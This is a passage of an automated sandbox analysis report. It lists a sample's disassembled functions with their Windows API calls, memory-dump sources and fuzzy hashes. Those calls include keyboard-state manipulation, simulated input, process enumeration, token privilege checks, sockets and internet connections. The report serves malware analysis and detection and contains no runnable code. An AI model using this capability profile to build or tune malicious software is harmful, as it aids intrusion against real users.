                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientMoveRectScreen
                                                                    • String ID:
                                                                    • API String ID: 3880355969-0
                                                                    • Opcode ID: 1b23c434ed14b5254d7318180a9eb93f84924ba0e384302daea86c1f8582ce13
                                                                    • Instruction ID: b8a3c25fe0f1ac73aea60d7b274f99ddc7fb95796a78e762a388340735a0d222
                                                                    • Opcode Fuzzy Hash: 1b23c434ed14b5254d7318180a9eb93f84924ba0e384302daea86c1f8582ce13
                                                                    • Instruction Fuzzy Hash: 25514F34A00209EFDF10CF58D988AAE7BB5FF45360F15815DF8659B2A0D730AE41DB90
                                                                    Function 00C69A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C69AD2
                                                                    • __itow.LIBCMT ref: 00C69B03
                                                                      • Part of subcall function 00C69D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C69DBE
                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C69B6C
                                                                    • __itow.LIBCMT ref: 00C69BC3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow
                                                                    • String ID:
                                                                    • API String ID: 3379773720-0
                                                                    • Opcode ID: 87009e11a82e4c57b65519a739f007c017e9ce79bf32860435b5d223cf35be31
                                                                    • Instruction ID: 76ff5c57393c1e5e27b87636fc9fe88015bc62784b509776d30a5331d2439811
                                                                    • Opcode Fuzzy Hash: 87009e11a82e4c57b65519a739f007c017e9ce79bf32860435b5d223cf35be31
                                                                    • Instruction Fuzzy Hash: CE415574A00208ABDF31EF54D885FFE7BB9EF89750F000069F915A7291DB709A85EB91
                                                                    Function 00C869AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00C869D1
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00C869E1
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C86A45
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00C86A51
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                                    • String ID:
                                                                    • API String ID: 2214342067-0
                                                                    • Opcode ID: aa88eb8c4af8255104c822653757f6ef8c589614d53673f12dd84a9033e52dc8
                                                                    • Instruction ID: d6d38e175914b2be66c3fad2cd894cc2d6e20f2be170790b145e2d6e46b9b543
                                                                    • Opcode Fuzzy Hash: aa88eb8c4af8255104c822653757f6ef8c589614d53673f12dd84a9033e52dc8
                                                                    • Instruction Fuzzy Hash: B7419F75640200AFEB60BF24DC96FBA77A8DF06B14F04C018FA19AB2C2DB709D41A795
                                                                    Function 00C8641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C9F910), ref: 00C864A7
                                                                    • _strlen.LIBCMT ref: 00C864D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID:
                                                                    • API String ID: 4218353326-0
                                                                    • Opcode ID: ab25517456fc88f4cdd93f522bd6178b6e5166a39d0c71d92fe2dbbf57ff046b
                                                                    • Instruction ID: 8aa73d235dca287e2ff611a4fc7df326b615393b4d4d31755fdb02fa60a1b87a
                                                                    • Opcode Fuzzy Hash: ab25517456fc88f4cdd93f522bd6178b6e5166a39d0c71d92fe2dbbf57ff046b
                                                                    • Instruction Fuzzy Hash: 1341F331A00104ABCB14FBA8DCD9FEEB7A8EF45314F148159F8199B292DB30EE41EB54
                                                                    Function 00C7B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C7B89E
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00C7B8C4
                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C7B8E9
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C7B915
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 3321077145-0
                                                                    • Opcode ID: 6f53f0666a1b873701c9ec269e6cdf8f4c2d35bacfe9d282259a1e87eb02d156
                                                                    • Instruction ID: c7c53b9debddb7469efd2ac88e815767729a29f090cd9d0e512fa77848a6e1fd
                                                                    • Opcode Fuzzy Hash: 6f53f0666a1b873701c9ec269e6cdf8f4c2d35bacfe9d282259a1e87eb02d156
                                                                    • Instruction Fuzzy Hash: DA410735600510DFDB10EF15C494A9DBBE1EF4A310F19C099ED5A9B3A2CB30EE42EB91
                                                                    Function 00C98851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C988DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 634782764-0
                                                                    • Opcode ID: e0b6e59016acc81966cc0d287cec476505ecd4034ab087ae6bd56516637fd07f
                                                                    • Instruction ID: 2a787c95a7abe090ba5abf214f38a466d610353dd47894a1d3dd0bbfcd1743d1
                                                                    • Opcode Fuzzy Hash: e0b6e59016acc81966cc0d287cec476505ecd4034ab087ae6bd56516637fd07f
                                                                    • Instruction Fuzzy Hash: 83319034600108AEEF209E58CC8DFBD77A5EB07310F954116FA25E72E1CA71EA489766
                                                                    Function 00C9AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ClientToScreen.USER32(?,?), ref: 00C9AB60
                                                                    • GetWindowRect.USER32(?,?), ref: 00C9ABD6
                                                                    • PtInRect.USER32(?,?,00C9C014), ref: 00C9ABE6
                                                                    • MessageBeep.USER32(00000000), ref: 00C9AC57
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1352109105-0
                                                                    • Opcode ID: e25bdb9d74973e262b2eacdbb1763a17fac4c2106330150fdb63cccb49ae42c3
                                                                    • Instruction ID: 0019fcc188ce50341bb8898513224ce69c1eaf3105a5116d57f898b1ec80c949
                                                                    • Opcode Fuzzy Hash: e25bdb9d74973e262b2eacdbb1763a17fac4c2106330150fdb63cccb49ae42c3
                                                                    • Instruction Fuzzy Hash: D04138306002599FCF11DF58D888BAD7BF5FB49310F1881AAE825DF265D732E941DB92
                                                                    Function 00C70AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C70B27
                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00C70B43
                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00C70BA9
                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C70BFB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: 5358b3009b71603e5b8b9b8f2b69210876832f0780f0815f6e8cd7415f594ee4
                                                                    • Instruction ID: c8e90a54c1edde30a9a8a22de034e1e8c65c3c5525f0de3d0be6b8239b9bef3e
                                                                    • Opcode Fuzzy Hash: 5358b3009b71603e5b8b9b8f2b69210876832f0780f0815f6e8cd7415f594ee4
                                                                    • Instruction Fuzzy Hash: 5C315A70D40608EFFF308B65CC09BFEBBA6AB45318F28C25AF4A8921D1C3748B519751
                                                                    Function 00C70C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00C70C66
                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C70C82
                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C70CE1
                                                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00C70D33
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: c0a0f312a690ecf9a8225a016f35da37617fd5105a2d460325785fab9e07e148
                                                                    • Instruction ID: 6ea1c11c645f8b178377c4cba8f4ac76371fce61b4900f784f56251565be680c
                                                                    • Opcode Fuzzy Hash: c0a0f312a690ecf9a8225a016f35da37617fd5105a2d460325785fab9e07e148
                                                                    • Instruction Fuzzy Hash: F7312630940318EEFF318B6988097FEBBAAAB45310F24C35FE4A9921D1C3759A55D762
                                                                    Function 00C461C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C461FB
                                                                    • __isleadbyte_l.LIBCMT ref: 00C46229
                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C46257
                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C4628D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                    • String ID:
                                                                    • API String ID: 3058430110-0
                                                                    • Opcode ID: 66fd57db5f47d33d8bff6e82a795e25cba93feb922b4ca9e3fdc6399f2658a1e
                                                                    • Instruction ID: d4d91f098c946f2cb0b31d7f01fca7d9e674b33a2acad11d1122e4710e12ebf7
                                                                    • Opcode Fuzzy Hash: 66fd57db5f47d33d8bff6e82a795e25cba93feb922b4ca9e3fdc6399f2658a1e
                                                                    • Instruction Fuzzy Hash: DE31DE30600286BFDF318F65CC48BAE7BA9FF42310F154029E864971A5E770EA50DB92
                                                                    Function 00C94EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 00C94F02
                                                                      • Part of subcall function 00C73641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C7365B
                                                                      • Part of subcall function 00C73641: GetCurrentThreadId.KERNEL32 ref: 00C73662
                                                                      • Part of subcall function 00C73641: AttachThreadInput.USER32(00000000,?,00C75005), ref: 00C73669
                                                                    • GetCaretPos.USER32(?), ref: 00C94F13
                                                                    • ClientToScreen.USER32(00000000,?), ref: 00C94F4E
                                                                    • GetForegroundWindow.USER32 ref: 00C94F54
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                    • String ID:
                                                                    • API String ID: 2759813231-0
                                                                    • Opcode ID: 9e98bd873ed2b3ca0956276fb7c3d801db1460c764d3c992e88663ec22fe4a72
                                                                    • Instruction ID: eb7b21a852ae0c26e284aaffc851f1007bae0e7ed6be3e24351ab3d786cd753e
                                                                    • Opcode Fuzzy Hash: 9e98bd873ed2b3ca0956276fb7c3d801db1460c764d3c992e88663ec22fe4a72
                                                                    • Instruction Fuzzy Hash: ED311C71D00108AFDB10EFA5C885EEFB7FDEF99300F10406AE415E7241EA71AE459BA0
                                                                    Function 00C73C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00C73C7A
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00C73C88
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00C73CA8
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C73D52
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 420147892-0
                                                                    • Opcode ID: f6c08b04479d95b0fb60576733e7d9629c5df0732e0ba6e262bb6eea010617fd
                                                                    • Instruction ID: 9470812f0826d222e2fe4d3a32c8ad026b6638ed3e8f059b564a6af4fb587333
                                                                    • Opcode Fuzzy Hash: f6c08b04479d95b0fb60576733e7d9629c5df0732e0ba6e262bb6eea010617fd
                                                                    • Instruction Fuzzy Hash: 2B31CF31108344DFD310EF60C884AAEBBE8EF95300F40492DF495861A1EB719A8AEB92
                                                                    Function 00C9C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • GetCursorPos.USER32(?), ref: 00C9C4D2
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C4B9AB,?,?,?,?,?), ref: 00C9C4E7
                                                                    • GetCursorPos.USER32(?), ref: 00C9C534
                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C4B9AB,?,?,?), ref: 00C9C56E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                    • String ID:
                                                                    • API String ID: 2864067406-0
                                                                    • Opcode ID: cc426e04314cfd1ea921f32259a5a9e645529f67962282e00df63a6ccba98c02
                                                                    • Instruction ID: c12037d22d156108eabff7e821ff74dbb52e163f1d6ef075be98b5222c9758d8
                                                                    • Opcode Fuzzy Hash: cc426e04314cfd1ea921f32259a5a9e645529f67962282e00df63a6ccba98c02
                                                                    • Instruction Fuzzy Hash: AA318F35600058AFCF158F98C89CEEE7BB5EB09310F45406AF9158B2A1C731AE61EBA4
                                                                    Function 00C68656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C68121
                                                                      • Part of subcall function 00C6810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C6812B
                                                                      • Part of subcall function 00C6810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C6813A
                                                                      • Part of subcall function 00C6810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C68141
                                                                      • Part of subcall function 00C6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C68157
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C686A3
                                                                    • _memcmp.LIBCMT ref: 00C686C6
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C686FC
                                                                    • HeapFree.KERNEL32(00000000), ref: 00C68703
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                    • String ID:
                                                                    • API String ID: 1592001646-0
                                                                    • Opcode ID: e5d1ced28259b598a8650d01a623703f5a3705a10af07d76e593aed2cbd5640b
                                                                    • Instruction ID: fa569948783ea9de40e4f90032c12aae1255601535e53b35f187ede641f03d3b
                                                                    • Opcode Fuzzy Hash: e5d1ced28259b598a8650d01a623703f5a3705a10af07d76e593aed2cbd5640b
                                                                    • Instruction Fuzzy Hash: 9421AF71E10109EFDB20DFA4C989BEEB7B9EF44304F158159E854AB240DB71EE09DB90
                                                                    Function 00C3098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __setmode.LIBCMT ref: 00C309AE
                                                                      • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C77896,?,?,00000000), ref: 00C15A2C
                                                                      • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C77896,?,?,00000000,?,?), ref: 00C15A50
                                                                    • _fprintf.LIBCMT ref: 00C309E5
                                                                    • OutputDebugStringW.KERNEL32(?), ref: 00C65DBB
                                                                      • Part of subcall function 00C34AAA: _flsall.LIBCMT ref: 00C34AC3
                                                                    • __setmode.LIBCMT ref: 00C30A1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                    • String ID:
                                                                    • API String ID: 521402451-0
                                                                    • Opcode ID: acef3e904ba4ea1efa2dce7379b9f32c98121c7d01736101d088382d939e0368
                                                                    • Instruction ID: a49e44ab010d1eabe67275ccf6513a7120ba90f5f894a1cce73937d00d46a481
                                                                    • Opcode Fuzzy Hash: acef3e904ba4ea1efa2dce7379b9f32c98121c7d01736101d088382d939e0368
                                                                    • Instruction Fuzzy Hash: 5C113A72914204AFDB08B7B4AC879FE7768DF82320F244015F105971C2EE30598677E1
                                                                    Function 00C81767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C817A3
